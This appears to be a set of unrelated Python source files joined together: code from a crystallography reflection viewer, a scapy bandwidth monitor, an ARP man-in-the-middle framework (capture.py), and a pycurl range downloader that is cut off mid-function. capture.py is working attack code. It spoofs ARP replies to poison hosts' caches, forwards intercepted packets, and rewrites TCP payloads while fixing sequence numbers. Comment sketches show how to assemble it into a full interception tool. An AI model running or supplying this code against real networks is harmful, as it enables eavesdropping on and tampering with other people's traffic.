def RotateAroundFracVector(self, phi, r1,r2,r3, prevrotmx = matrix.identity(3), quietbrowser=True):
# Assuming vector is in real space fractional coordinates turn it into cartesian
cartvec = list( (r1,r2,r3) * matrix.sqr(self.miller_array.unit_cell().orthogonalization_matrix()) )
# Rodrigues' rotation formula for a rotation by the angle phi around a vector through the origin.
# See http://mathworld.wolfram.com/RodriguesRotationFormula.html
# R = I + sin(phi)*W + 2*sin^2(phi/2)*W^2, where W is the skew-symmetric cross product matrix of the unit axis vector
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
W = matrix.sqr([0, -uz, uy, uz, 0, -ux, -uy, ux, 0])
#W = matrix.sqr([0, uz, -uy, -uz, 0, ux, uy, -ux, 0])
I = matrix.identity(3)
sin2phi2 = math.sin(phi/2)
sin2phi2 *= sin2phi2
RotMx = I + math.sin(phi)*W + 2* sin2phi2 * W*W
RotMx = RotMx * prevrotmx # impose any other rotation already performed
self.RotateMxStage(RotMx, quietbrowser)
return RotMx, [ux, uy, uz]
def SpinAnimate(self, r1, r2, r3):
self.msgqueue.append(("SpinAnimate", "%s, %s, %s" %(r1, r2, r3) ))
def DrawUnitCell(self):
self.AddVector(0,0,0, 1,0,0, False, label="200a/V", r=0.5, g=0.8, b=0.8)
self.AddVector(0,0,0, 0,1,0, False, label="200b/V", r=0.8, g=0.5, b=0.8)
self.AddVector(0,0,0, 0,0,1, False, label="200c/V", r=0.8, g=0.8, b=0.5)
self.AddVector(1,0,0, 1,1,0, False, r=0.8, g=0.5, b=0.8)
self.AddVector(0,1,0, 1,1,0, False, r=0.5, g=0.8, b=0.8)
self.AddVector(0,0,1, 1,0,1, False, r=0.5, g=0.8, b=0.8)
self.AddVector(0,0,1, 0,1,1, False, r=0.8, g=0.5, b=0.8)
self.AddVector(0,1,1, 1,1,1, False, r=0.5, g=0.8, b=0.8)
self.AddVector(1,0,1, 1,1,1, False, r=0.8, g=0.5, b=0.8)
self.AddVector(1,0,0, 1,0,1, False, r=0.8, g=0.8, b=0.5)
self.AddVector(0,1,0, 0,1,1, False, r=0.8, g=0.8, b=0.5)
self.AddVector(1,1,0, 1,1,1, False, r=0.8, g=0.8, b=0.5, name="unitcell")
def DrawReciprocalUnitCell(self):
n=2
self.AddVector(0,0,0, n,0,0, label="2a*", r=0.5, g=0.3, b=0.3)
self.AddVector(0,0,0, 0,n,0, label="2b*", r=0.3, g=0.5, b=0.3)
self.AddVector(0,0,0, 0,0,n, label="2c*", r=0.3, g=0.3, b=0.5)
self.AddVector(n,0,0, n,n,0, r=0.3, g=0.5, b=0.3)
self.AddVector(0,n,0, n,n,0, r=0.5, g=0.3, b=0.3)
self.AddVector(0,0,n, n,0,n, r=0.5, g=0.3, b=0.3)
self.AddVector(0,0,n, 0,n,n, r=0.3, g=0.5, b=0.3)
self.AddVector(0,n,n, n,n,n, r=0.5, g=0.3, b=0.3)
self.AddVector(n,0,n, n,n,n, r=0.3, g=0.5, b=0.3)
self.AddVector(n,0,0, n,0,n, r=0.3, g=0.3, b=0.5)
self.AddVector(0,n,0, 0,n,n, r=0.3, g=0.3, b=0.5)
self.AddVector(n,n,0, n,n,n, r=0.3, g=0.3, b=0.5, name="reciprocal_unitcell")
def fix_orientation(self, val):
if val:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
def clip_plane_hkl_vector(self, h, k, l, hkldist=0.0,
clipwidth=None, fixorientation=True, is_parallel=False):
# create clip plane that is normal to the reciprocal hkl vector
if h==0.0 and k==0.0 and l==0.0 or clipwidth <= 0.0:
self.RemoveVectorsNoClipPlane()
return
self.RemoveVectors("clip_vector")
R = -l * self.normal_hk + h * self.normal_kl + k * self.normal_lh
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
R[0][0], R[0][1], R[0][2], isreciprocal=False,
name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
if is_parallel:
self.vecrotmx = self.PointVectorParallelToClipPlane()
else:
self.vecrotmx = self.PointVectorPerpendicularToClipPlane()
halfdist = -self.cameraPosZ - hkldist # self.viewer.boundingZ*0.5
if clipwidth is None:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, self.cameraPosZ)
self.TranslateHKLpoints(R[0][0], R[0][1], R[0][2], hkldist)
self.DrawUnitCell()
self.DrawReciprocalUnitCell()
def clip_plane_abc_vector(self, a, b, c, hkldist=0.0,
clipwidth=None, fixorientation=True, is_parallel=False):
# create clip plane that is normal to the realspace fractional abc vector
if a==0.0 and b==0.0 and c==0.0 or clipwidth <= 0.0:
self.RemoveVectorsNoClipPlane()
return
self.RemoveVectors("clip_vector")
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
a, b, c, isreciprocal=False, name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
if is_parallel:
self.vecrotmx = self.PointVectorParallelToClipPlane()
else:
self.vecrotmx = self.PointVectorPerpendicularToClipPlane()
halfdist = -self.cameraPosZ - hkldist # self.viewer.boundingZ*0.5
if clipwidth is None:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, self.cameraPosZ)
self.DrawUnitCell()
self.DrawReciprocalUnitCell()
def clip_plane_to_HKL_vector(self, h, k, l, hkldist=0.0,
clipwidth=None, fixorientation=True):
if h==0.0 and k==0.0 and l==0.0 or clipwidth==None:
self.RemoveVectorsNoClipPlane()
return
self.RemoveVectors("clip_vector")
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
h, k, l, isreciprocal=False,
name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
self.PointVectorPerpendicularToClipPlane()
halfdist = -self.cameraPosZ - hkldist # self.viewer.boundingZ*0.5
if clipwidth is None:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, self.cameraPosZ)
self.TranslateHKLpoints(h,k,l, hkldist)
def RemoveVectorsNoClipPlane(self):
self.EnableMouseRotation()
self.RemoveVectors()
self.SetClipPlaneDistances(0, 0)
self.TranslateHKLpoints(0, 0, 0, 0.0)
def SetTrackBallRotateSpeed(self, trackspeed):
msg = str(trackspeed)
self.msgqueue.append( ("SetTrackBallRotateSpeed", msg) )
self.GetTrackBallRotateSpeed()
def GetTrackBallRotateSpeed(self):
self.ngl_settings.mouse_sensitivity = None
self.msgqueue.append( ("GetTrackBallRotateSpeed", "") )
if self.WaitforHandshake(5):
nwait = 0
while self.ngl_settings.mouse_sensitivity is None and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
def SetClipPlaneDistances(self, near, far, cameraPosZ=None):
if cameraPosZ is None:
cameraPosZ = self.cameraPosZ
msg = str(near) + ", " + str(far) + ", " + str(cameraPosZ)
self.msgqueue.append( ("SetClipPlaneDistances", msg) )
def GetClipPlaneDistances(self):
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.msgqueue.append( ("GetClipPlaneDistances", "") )
if self.WaitforHandshake(5):
nwait = 0
while self.clipFar is None and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
self.mprint("clipnear, clipfar, cameraPosZ: %s, %s %s" \
%(self.clipNear, self.clipFar, self.cameraPosZ), 2)
return (self.clipNear, self.clipFar, self.cameraPosZ)
def GetBoundingBox(self):
self.boundingX = 0.0
self.boundingY = 0.0
self.boundingZ = 0.0
self.msgqueue.append( ("GetBoundingBox", "") )
if self.WaitforHandshake(5):
nwait = 0
while self.boundingX is None and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
self.mprint("boundingXYZ: %s, %s %s" \
%(self.boundingX, self.boundingY, self.boundingZ), verbose=2)
return (self.boundingX, self.boundingY, self.boundingZ)
def RemoveVectors(self, reprname=""):
self.msgqueue.append( ("RemoveVectors", reprname ))
def TestNewFunction(self):
self.SendMsgToBrowser("Testing")
def DisableMouseRotation(self): # disable rotating with the mouse
self.SendMsgToBrowser("DisableMouseRotation")
def EnableMouseRotation(self): # enable rotating with the mouse
self.SendMsgToBrowser("EnableMouseRotation")
def Euler2RotMatrix(self, eulerangles):
eulerangles1 = eulerangles
radangles = [e*math.pi/180.0 for e in eulerangles1]
RotMx = scitbx.math.euler_angles_as_matrix(radangles)
return RotMx
def RotateMxStage(self, rotmx, quietbrowser=True):
scaleRot = rotmx * self.cameradist
ortrot = scaleRot.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.msgqueue.append( ("RotateStage", msg) )
def TranslateHKLpoints(self, h, k, l, mag):
# cast this reciprocal vector into cartesian before messaging NGL to translate our HKL points
#vec = self.miller_array.unit_cell().reciprocal_space_vector((h, k, l))
hkl_vec = flex.vec3_double( [(h,k,l)])
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().orthogonalization_matrix() )
cartvec = hkl_vec * rfracmx
if cartvec.norm()==0.0 or mag==0.0:
svec = (0, 0, 0)
else:
#cartvec = (mag/cartvec.norm()) * cartvec
cartvec = (-mag*self.scene.renderscale/hkl_vec.norm()) * cartvec
#svec = [cartvec[0][0]*self.scene.renderscale, cartvec[0][1]*self.scene.renderscale, cartvec[0][2]*self.scene.renderscale ]
svec = cartvec[0]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("cartesian translation vector is: " + str(roundoff(svec)), verbose=1)
str_vec = str(svec)
str_vec = str_vec.replace("(", "")
str_vec = str_vec.replace(")", "")
msg = str_vec + "\n"
self.msgqueue.append( ("TranslateHKLpoints", msg) )
def InjectNewReflections(self, proc_array):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(proc_array, 0, copy.deepcopy(self.settings), { } , None)
strdata = ""
hklscene = hklscenes[0]
self.scene = hklscene
for i,radius in enumerate(hklscene.radii):
ftuple = (hklscene.points[i][0], hklscene.points[i][1], hklscene.points[i][2],
hklscene.colors[i][0], hklscene.colors[i][1], hklscene.colors[i][2], radius )
strdata += "%s,%s,%s,%s,%s,%s,%s," % roundoff(ftuple, 2)
strdata = strdata[:-1] # avoid the last comma
self.isinjected = True
self.msgqueue.append( ("InjectNewReflections", strdata) )
ngl_philstr = """
mouse_sensitivity = 0.2
.type = float
bin_opacities = ""
.type = str
tooltip_alpha = 0.85
.type = float
fixorientation = False
.type = bool
camera_type = *orthographic perspective
.type = choice
"""
NGLmaster_phil = libtbx.phil.parse( ngl_philstr )
NGLparams = NGLmaster_phil.fetch().extract()
def reset_NGLsettings():
"""
Reset NGL settings to their default values as specified in the phil definition string
"""
#global NGLmaster_phil
#global ngl_philstr
#global NGLparams
NGLparams = NGLmaster_phil.fetch(source = libtbx.phil.parse( ngl_philstr) ).extract()
def NGLsettings():
"""
Get a global phil parameters object containing some NGL settings
"""
#global NGLparams
return NGLparams
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
import asyncio
import math
import websockets
async def time(websocket, path):
x = 0
for i in range(1000):
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
await websocket.send( msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
await websocket.send( msg )
message = await websocket.recv()
print( message)
await asyncio.sleep(0.2)
start_server = websockets.serve(time, '127.0.0.1', 7894)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
"""
|
network_analyzer.py
|
from scapy.all import *
import matplotlib.pyplot as plt
from binascii import hexlify
from threading import Thread
from datetime import datetime
import time
class Network_Analyzer:
def __init__(self, time, segment_len):
self.time = time
self.segment_len = segment_len
self.bws = []
self.ts = [0]
self.capture_thread= None
for i in range(0,int(time/self.segment_len)-1):
if len(self.ts) == 0:
continue
self.ts.append(self.ts[-1] + self.segment_len)
def capture(self, iface):
bw = []
print(f"Capturing traffic for {self.time}s")
f_time = datetime.now().timestamp()
packets = sniff(iface=iface, timeout=self.time)
f_time = 0 ## Timestamp of first packet
current_segment = 1
segment_load = 0
for packet in packets:
if f_time == 0:
f_time = packet.time
try:
packet[IP].src
except IndexError:
continue
if packet.time > f_time + current_segment*self.segment_len:
#New segment
segment_bw = ((segment_load*8)/self.segment_len)/1024
bw.append(segment_bw)
segment_load = 0
current_segment = current_segment + 1
#Calculate pauses if no packet was transmitted
if (packet.time - (f_time+current_segment*self.segment_len)) > (2* self.segment_len):
pause =int((packet.time - f_time-current_segment*self.segment_len)/self.segment_len)
print(pause)
for i in range(pause):
current_segment = current_segment + 1
bw.append(0)
segment_load = segment_load + len(packet)
self.bws.append(bw)
def run_capture_thread(self, ifce):
print("Running a capture thread")
self.capture_thread = Thread(target=self.capture, args=(ifce,))
self.capture_thread.start()
pass
def join_capture_thread(self):
self.capture_thread.join()
#print(self.bws[0])
#print(self.ts)
print(f"{len(self.bws[0])} - {len(self.ts)}")
def plot(self, file_name=None):
plt.clf()
average = [0] * int((self.time/self.segment_len))
average_div = [0] * int((self.time/self.segment_len))
for bw in self.bws:
for i in range(0,len(self.ts)-len(bw)):
bw.append(0)
plt.plot(self.ts , bw, alpha=0.1)
for i in range(len(bw)):
average[i] = average[i] + bw[i]
average_div[i] = average_div[i] + 1
for i in range(len(average)):
try:
average[i] = average[i]/average_div[i]
except ZeroDivisionError:
average[i] = 0
x = 0
for i in range(len(average)):
x = i
if average_div[i] == 0:
break
plt.plot(self.ts, average, "black")
print("Updating plots")
if file_name is None:
plt.title("Bandwidth")
plt.xlabel("time[s]")
plt.ylabel("bandwidth[Kbits/s]")
plt.ion()
plt.show()
plt.draw()
plt.pause(0.001)
else:
pass #Save figure
if __name__ == "__main__":
na = Network_Analyzer(30, 0.5)
try:
while True:
print("New sequence")
na.run_capture_thread("sw2-h2")
na.join_capture_thread()
na.plot()
time.sleep(20)
except KeyboardInterrupt:
print("Exiting")
'''
#packets = sniff(iface="s1-s2", timeout=100)
# Time length of segment
#segment_length = 1
#Bandwidth Array
bw = [0]
#Time array
ts = []
f_time = 0
segment_load = 0
segment_start_time = 10
for packet in packets:
if f_time == 0:
f_time = packet.time
segment_start_time = f_time
if packet.time > segment_start_time + segment_length:
#New segment
segment_bw = ((segment_load*8)/segment_length)/1024
print(segment_load*8)
print(segment_length)
print(segment_bw)
bw.append(segment_bw)
if (packet.time - segment_start_time) > (2* segment_length):
print(packet.time)
print(segment_start_time)
pause =int((packet.time - segment_start_time)/segment_length)
#pause = int(() / segment_length)
print(pause)
for i in range(pause):
bw.append(0)
segment_load = 0
segment_start_time = packet.time
segment_load = segment_load + len(packet)
ts = []
x = 0
for i in range(0,len(bw)):
ts.append(x)
x = x + segment_length
print(ts)
print(bw)
plt.plot(ts,bw)
plt.savefig('test.png')
'''
|
capture.py
|
# coding: utf-8
"""
Capture and manipulate traffic off the network.
This module provides a Sniffer class and a few "modules" which can be assembled to form attack tools.
These classes are based on Scapy and provide a convenient way to interact with and compose tools from its functionality.
The advanced functions such as ARP poisoning, packet forwarding, and analysis are decomposed into modules to allow
for greater flexibility. Look at the constructed strategies for examples of how to compose the modules; an illustrative
composition sketch also appears after the ArpMitmModule class below.
"""
import scapy.all as scapy
import enum
import net
import threading
import time
import socket
# Turn off print messages
scapy.conf.verb = 0
class Sniffer:
"""
Sniffer is the core component of the traffic capture framework.
This class uses the Scapy sniffer to collect packets off the wire and passes them to the registered modules for processing. A commented usage sketch follows this class.
"""
def __init__(self, iface=None, processor=None, store=False, filter=None, quantum=0.25):
self.iface = iface
self.processor = processor
self.store = store
self.quantum = quantum
self.filter = filter
self.modules = []
self.packets = []
self._thread = None
self._l2socket = None
self._stopevent = threading.Event()
self._moduleslock = threading.RLock()
self._newmodules = []
def register(self, *mods):
with self._moduleslock:
self.modules.extend(mods)
self._newmodules.extend(mods)
def process(self, pkt):
with self._moduleslock:
for mod in self.modules:
if mod not in self._newmodules:
mod.process(pkt)
if self.processor is not None:
self.processor(pkt)
def run(self):
try:
self._l2socket = scapy.conf.L2listen(iface=self.iface, filter=self.filter)
while not self._stopevent.is_set():
with self._moduleslock:
while self._newmodules:
self._newmodules.pop().start(self)
pkts = self._l2socket.sniff(timeout=self.quantum, prn=self.process, store=self.store)
self.packets.extend(pkts)
finally:
with self._moduleslock:
for mod in self.modules:
mod.stop()
if self._l2socket is not None:
self._l2socket.close()
self._l2socket = None
def start(self):
self._stopevent.clear()
if self._thread is None or not self._thread.is_alive():
with self._moduleslock:
self._newmodules = list(self.modules)
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
def join(self):
if self._thread is not None:
self._thread.join()
def stop(self):
self._stopevent.set()
def __enter__(self):
self.start()
return self
def __exit__(self, *args, **kwargs):
self.stop()
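# --- Illustrative usage sketch (an assumption, not part of the original code) ---
# The Sniffer docstring above describes collecting packets and handing them to modules
# and/or a processor callback. A minimal use, assuming an interface named "eth0", could
# look roughly like this:
#
#   def show(pkt):
#       print(pkt.summary())        # one line summary of each sniffed packet
#
#   sniffer = Sniffer(iface="eth0", processor=show, filter="tcp")
#   with sniffer:                   # __enter__ calls start(), __exit__ calls stop()
#       time.sleep(10)              # sniff for ten seconds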
class Module:
"""
Module is the base for a packet sniffer module.
Implementations of Module each provide a discrete piece of functionality for complex packet analysis and manipulation.
"""
def start(self, sniffer):
"""
Start will be called when the sniffer starts
"""
pass
def process(self, pkt):
"""
Process will be called for every packet received by the sniffer
"""
pass
def stop(self):
"""
Stop will be called when the sniffer stops
"""
pass
class ArpCacheModule(Module):
"""
ArpCacheModule provides a cache of the ARP associations provided by other hosts.
It ignores ARP messages sent from this host and any other hosts specified in ``ignore``.
"""
def __init__(self, ignore=None):
self.sniffer = None
self.ignore = set() if ignore is None else set(ignore)
self.cache = {}
def start(self, sniffer):
self.sniffer = sniffer
if self.sniffer.iface is not None:
self.ignore.add(str(net.ifhwaddr(self.sniffer.iface)))
def process(self, pkt):
if scapy.Ether in pkt and scapy.ARP in pkt:
src = pkt[scapy.Ether].src
if src != '00:00:00:00:00:00' and src not in self.ignore:
psrc = pkt[scapy.ARP].psrc
if psrc != '0.0.0.0':
self.cache[psrc] = src
class ArpPoisonerModule(Module):
"""
ArpPoisonerModule will send out spoofed ARP messages at regular intervals to poison the network.
It also starts by sending out an arping to all targets to see who is on the network and populate the cache.
"""
def __init__(self, arpcache, iface=None, hwaddr=None, target=None, impersonate=None, interval=1):
self.arpcache = arpcache
self.iface = iface
self.interval = interval
self.hwaddr = hwaddr
self.target = target
self.impersonate = impersonate
self.sniffer = None
self._stopevent = threading.Event()
self._thread = None
@staticmethod
def enumerate(net):
if isinstance(net, str):
net = scapy.Net(net)
return net
def arping(self, target=None):
# Figure out who we are trying to resolve
if target is None:
if self.target is None or self.impersonate is None:
pdst = net.ifcidr(self.iface)
else:
# It has to be a list because scapy can be really cool, but also kinda wonky
pdst = list(set(self.enumerate(self.target)) | set(self.enumerate(self.impersonate)))
else:
pdst = target
# Send out an arp "who-has" requests
pkts = scapy.Ether(src=self.hwaddr, dst='ff:ff:ff:ff:ff:ff')/scapy.ARP(op='who-has', hwsrc=self.hwaddr, pdst=pdst)
scapy.sendp(pkts, iface=self.iface)
def arpoison(self, target=None, impersonate=None):
# Chose the target and impersonation lists
impersonate = impersonate or self.impersonate or net.ifcidr(self.iface)
target = target or self.target or net.ifcidr(self.iface)
ifaddr = str(net.ifaddr(self.iface))
# Filter out targets and impersonations not in our ARP cache
pdst = [ip for ip in self.enumerate(target) if ip in self.arpcache]
psrc = [ip for ip in self.enumerate(impersonate) if ip in self.arpcache]
if pdst:
# Build the packet list and filter out packets that would be sent to the true ip owner
pkts = [scapy.Ether(src=self.hwaddr, dst=self.arpcache[ip])/scapy.ARP(op=['who-has', 'is-at'], hwsrc=self.hwaddr, psrc=psrc, pdst=ip) for ip in pdst]
pkts = [p for p in pkts if p.psrc != p.pdst and p.dst != ifaddr]
# Launch the payload
scapy.sendp(pkts, iface=self.iface)
def run(self):
if self.hwaddr is None:
self.hwaddr = str(net.ifhwaddr(self.iface))
self.arping()
while not self._stopevent.is_set():
self.arpoison()
time.sleep(self.interval)
def start(self, sniffer):
self._stopevent.clear()
self.sniffer = sniffer
if self.iface is None:
self.iface = self.sniffer.iface
if self._thread is None or not self._thread.is_alive():
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
def stop(self):
self._stopevent.set()
class ForwarderModule(Module):
"""
ForwarderModule forwards packets received by the sniffer and in the ARP cache, after applying a filter.
This serves to forward on packets intercepted, such as by ARP poisoning, onto the intended hosts.
The filter function should return one packet, a list of packets, or None.
Returned packets will be sent after having their eithernet addresses set.
"""
def __init__(self, arpcache, filter=None, iface=None, hwaddr=None):
self.arpcache = arpcache
self.filter = filter
self.iface = iface
self.hwaddr = hwaddr
self.sniffer = None
def start(self, sniffer):
self.sniffer = sniffer
if self.iface is None:
self.iface = sniffer.iface
if self.hwaddr is None:
self.hwaddr = str(net.ifhwaddr(self.iface))
def process(self, pkt):
if scapy.IP in pkt and scapy.Ether in pkt:
if pkt[scapy.Ether].dst == self.hwaddr and pkt[scapy.Ether].src != self.hwaddr:
if pkt[scapy.IP].dst in self.arpcache:
pkt = pkt.copy()
pkt[scapy.Ether].dst = self.arpcache[pkt[scapy.IP].dst]
# After having patched the dst MAC, but before patching the src, apply the filter
if self.filter is not None:
pkt = self.filter(pkt)
if pkt is not None:
pkt[scapy.Ether].src = self.hwaddr
scapy.sendp(pkt, iface=self.iface)
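# --- Illustrative filter sketch (an assumption, not part of the original code) ---
# The ForwarderModule docstring above says the filter takes a packet and returns a packet,
# a list of packets, or None to drop it. A hypothetical filter that drops DNS queries while
# forwarding everything else, given some ARP cache dict named arpcache, could look like:
#
#   def drop_dns(pkt):
#       if scapy.UDP in pkt and pkt[scapy.UDP].dport == 53:
#           return None             # drop the packet
#       return pkt                  # forward unchanged
#
#   forwarder = ForwarderModule(arpcache, filter=drop_dns, iface="eth0")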
class ArpMitmModule(Module):
def __init__(self, filter=None, iface=None, hwaddr=None):
self.cache = ArpCacheModule(ignore=[hwaddr])
self.poisoner = ArpPoisonerModule(self.cache.cache, iface=iface, hwaddr=hwaddr)
self.forwarder = ForwarderModule(self.cache.cache, filter=filter, iface=iface, hwaddr=hwaddr)
self.submodules = (self.cache, self.poisoner, self.forwarder)
self.sniffer = None
def start(self, sniffer):
self.sniffer = sniffer
for mod in self.submodules:
mod.start(sniffer)
def process(self, pkt):
for mod in self.submodules:
mod.process(pkt)
def stop(self):
for mod in self.submodules:
mod.stop()
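# --- Illustrative composition sketch (an assumption, not part of the original code) ---
# As the module docstring suggests, the pieces compose into a simple ARP man-in-the-middle
# tool. Assuming an interface named "eth0" and an output file name of our choosing:
#
#   mitm = ArpMitmModule(iface="eth0")
#   sniffer = Sniffer(iface="eth0", store=True)
#   sniffer.register(mitm)
#   with sniffer:
#       time.sleep(60)                              # poison, capture and forward for a minute
#   scapy.wrpcap("capture.pcap", sniffer.packets)   # write the stored packets to disk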
class TcpFlags(enum.IntEnum):
FIN = 0x01
SYN = 0x02
RST = 0x04
PSH = 0x08
ACK = 0x10
URG = 0x20
ECE = 0x40
CWR = 0x80
class TcpFlowKey:
@classmethod
def frompkt(cls, pkt):
ip, tcp = pkt[scapy.IP], pkt[scapy.TCP]
return cls(ip.src, tcp.sport, ip.dst, tcp.dport)
def __init__(self, src, sport, dst, dport):
self.src = src
self.sport = sport
self.dst = dst
self.dport = dport
def inverse(self):
return self.__class__(self.dst, self.dport, self.src, self.sport)
def __hash__(self):
return hash((self.src, self.sport, self.dst, self.dport))
def __eq__(self, other):
return all((
isinstance(other, self.__class__),
self.src == other.src,
self.sport == other.sport,
self.dst == other.dst,
self.dport == other.dport
))
class TcpFilter:
"""
TcpFilter wraps a packet filter and adjusts seq and ack numbers to account for altered data lengths
The wrapped filter should not change the seq or ack number, as they will be reset.
The wrapped filter may drop a packet by returning None, in which case nothing will be forwarded.
A commented usage sketch follows the tcpfilter helper at the end of this file.
"""
def __init__(self, filter=None):
if filter is not None:
self.filter = filter
self.offsets = {}
class Offset:
def __init__(self):
self.list = []
def getseq(self, seq):
offset = 0
for curr in self.list:
if curr[0] < seq:
offset += curr[1]
else:
break
return seq + offset
def getack(self, ack):
for curr in self.list:
if curr[0] < ack:
ack -= curr[1]
else:
break
return ack
def add(self, seq, diff):
"""Add a new entry to the list to account for diff bytes added at seq"""
# Insert into sorted list using linear search because it will almost always be the front
new = (seq, diff)
for i, curr in enumerate(reversed(self.list)):
if new > curr:
self.list.insert(len(self.list) - i, new)
break
else:
self.list.insert(0, new)
def filter(self, pkt):
"""filter should be overriden if TcpFilter is subclassed"""
return pkt
def __call__(self, pkt):
if all(layer in pkt for layer in (scapy.Ether, scapy.IP, scapy.TCP)):
seq, ack = pkt[scapy.TCP].seq, pkt[scapy.TCP].ack
key = TcpFlowKey.frompkt(pkt)
if pkt[scapy.TCP].flags & TcpFlags.SYN or key not in self.offsets:
self.offsets[key] = self.Offset()
offset = self.offsets[key]
before = len(pkt[scapy.Raw].load) if scapy.Raw in pkt else 0
pkt = self.filter(pkt)
if pkt is None:
# The packet, and its data, was dropped
offset.add(seq, -before)
else:
after = len(pkt[scapy.Raw].load) if scapy.Raw in pkt else 0
diff = after - before
if diff != 0:
offset.add(seq, diff)
pkt[scapy.TCP].seq = offset.getseq(seq)
inverse_key = key.inverse()
if pkt[scapy.TCP].flags & TcpFlags.ACK and inverse_key in self.offsets:
pkt[scapy.TCP].ack = self.offsets[inverse_key].getack(ack)
# Force checksum recalculation
pkt[scapy.IP].len += diff
del pkt[scapy.TCP].chksum
del pkt[scapy.IP].chksum
return pkt
def tcpfilter(filter):
return TcpFilter(filter)
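# --- Illustrative tcpfilter sketch (an assumption, not part of the original code) ---
# As the TcpFilter docstring explains, the wrapper fixes up seq/ack numbers when a filter
# changes the payload length, so the wrapped filter only needs to edit the payload.
# A hypothetical payload-rewriting filter, usable as the ForwarderModule filter, could be:
#
#   @tcpfilter
#   def strip_compression(pkt):
#       if scapy.Raw in pkt:
#           load = pkt[scapy.Raw].load
#           pkt[scapy.Raw].load = load.replace(b"gzip, deflate", b"identity")
#       return pkt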
|
multithread.py
|
from threading import Thread
from time import sleep
from cyberpass import login
import cStringIO,StringIO, re
import urllib2, os, urllib
import pycurl
import time
def jo():
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
thread6.join()
def download(ip,url,filename,ranges,rangef):
print "==> Downloading File: ",filename," URL: ",url
fp = open(filename, "wb")
curl = pycurl.Curl()
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.NOSIGNAL, 1)
curl.setopt(pycurl.NOPROGRESS, 0)
curl.setopt(pycurl.PROGRESSFUNCTION, progress)
curl.setopt(pycurl.WRITEDATA, fp)
curl.setopt(pycurl.INTERFACE, ip)
curl.setopt(pycurl.RANGE, ranges+'-'+rangef)
curl.perform()
m = {}
m['effective-url'] = curl.getinfo(pycurl.EFFECTIVE_URL)
m['http-code'] = curl.getinfo(pycurl.HTTP_CODE)
m['total-time'] = curl.getinfo(pycurl.TOTAL_TIME)
m['namelookup-time'] = curl.getinfo(pycurl.NAMELOOKUP_TIME)
m['connect-time'] = curl.getinfo(pycurl.CONNECT_TIME)
m['pretransfer-time'] = curl.getinfo(pycurl.PRETRANSFER_TIME)
m['redirect-time'] = curl.getinfo(pycurl.REDIRECT_TIME)
m['redirect-count'] = curl.getinfo(pycurl.REDIRECT_COUNT)
m['size-upload'] = curl.getinfo(pycurl.SIZE_UPLOAD)
m['size-download'] = curl.getinfo(pycurl.SIZE_DOWNLOAD)
m['speed-upload'] = curl.getinfo(pycurl.SPEED_UPLOAD)
m['header-size'] = curl.getinfo(pycurl.HEADER_SIZE)
m['request-size'] = curl.getinfo(pycurl.REQUEST_SIZE)
m['content-length-download'] = curl.getinfo(pycurl.CONTENT_LENGTH_DOWNLOAD)
m['content-length-upload'] = curl.getinfo(pycurl.CONTENT_LENGTH_UPLOAD)
m['content-type'] = curl.getinfo(pycurl.CONTENT_TYPE)
m['response-code'] = curl.getinfo(pycurl.RESPONSE_CODE)
m['speed-download'] = curl.getinfo(pycurl.SPEED_DOWNLOAD)
